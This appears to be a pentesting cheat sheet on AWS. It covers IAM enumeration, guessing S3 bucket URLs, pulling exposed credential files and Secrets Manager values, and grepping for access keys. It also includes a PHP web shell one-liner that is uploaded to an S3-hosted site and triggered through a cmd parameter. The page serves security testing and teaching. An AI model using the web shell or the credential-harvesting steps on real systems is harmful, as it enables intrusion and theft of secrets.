AWS (Amazon Web Services) Pentesting

Last modified: 2022-11-22

AWS Web

AWS (Amazon Web Services) provide on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered pay-as-you-go basis.

Amazon Resource Names (ARNs)

# Format
arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>

Identify and Access Management (IAM)

# Add credentials
# This will add entries to .aws/config or .aws/credentials in user's home directory.
# <profile-name> is arbitrary.
aws configure --profile <profile-name>

# List credentials
aws configure list --profile <profile-name>


# Find the account id belonging to an access key (access key starts with "AKIA")
aws sts get-access-key-info --access-key-id AKIAQ31B...

# Determin the username the access key you're using belogns to
aws sts get-caller-identity --profile <profile-name>

# List all EC2 instances running in an account
aws ec2 describe-instances --output text --profile <profile-name>

# List all EC2 instances running in an account in a dirrerent region
aws ec2 describe-instances --output text --region us-east-1 --profile <profile-name>

Amazon S3

A public cloud storage resource available in Amazon Web Services (AWS) Simple Storage Service (S3), an object storage offering.

S3 Bucket URLs Commonly Used

If you find images in target website, open the images new tab and check the URLs if they're stored in Amazon S3.
The following URLs templates are often used.

http://example-assets.s3.amazonaws.com
http://s3.amazonaws.com/example-assets/

http://example-www.s3.amazonaws.com
http://s3.amazonaws.com/example-www/

http://example-public.s3.amazonaws.com
http://s3.amazonaws.com/example-public/

http://example-private.s3.amazonaws.com
http://s3.amazonaws.com/example-private/

http://example-bucket-zero.s3.amazonaws.com
http://s3.amazonaws.com/example-bucket-zero/

http://example-bucket-one.s3.amazonaws.com
http://s3.amazonaws.com/example-bucket-one/

http://example-bucket-two.s3.amazonaws.com
http://s3.amazonaws.com/example-bucket-two/

XML Content Discovery

Accessing the S3 Bucket URL, if the contents of XML,
```
...
<Contents>
<Key>creds.txt</Key>
...
```
Retrieve the content by accessing to URL like https://vulnerable-assets.s3.amazonaws.com/creds.txt.

AWS CLI

First off, you may need to configure aws.

aws configure

# http://<bucket-name>.s3.amazonaws.com

# List contents of a bucket
aws s3 ls s3://<bucket-name>/
aws s3 ls s3://<bucket-name>/ --no-sign-request
aws s3 ls s3://example.com

# Specify the endpoint
aws s3 --endpoint=http://example.com ls s3://example.com

# Download files from s3
aws s3 cp s3://<bucket-name>/example.xml .

# Upload files to s3
aws s3 cp ./example.txt s3://<bucket-name>

# --------------------------------------------------------------

# List all S3 buckets in the AWS account you've added.
aws s3 ls --profile PROFILENAME

Web Shell/Reverse Shell with CLI

Prepare Web Shell

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Upload the Web Shell

aws s3 cp ./shell.php s3://example.com
# or
aws s3 --endpoint=http://s3.example.com cp ./shell.php s3://example.com

Check if uploaded

aws s3 ls s3://example.com
# or
aws s3 --endpoint=http://s3.example.com ls s3://example.com

Execute Commands via Request

Send request to http://example.com/shell.php?cmd=whoami in browser or using curl.

Secrets Manager

# List secrets
aws secretsmanager list-secrets --profile <profile-name>

# Get secret value
# "secret-id" is the Name of the SecretList when run 'list-secrets'.
aws secretsmanager get-secret-value --secret-id <secret-id> --profile <profile-name>


# Help
aws secretsmanager help

Get Access Keys From Files

# Access Key ID starts with "AKIA"
grep -e AKIA ./*

Method

Security Risk

Cookie

CMS

Framework

Template Engine

API

Cloud

Microsoft

Tool

Others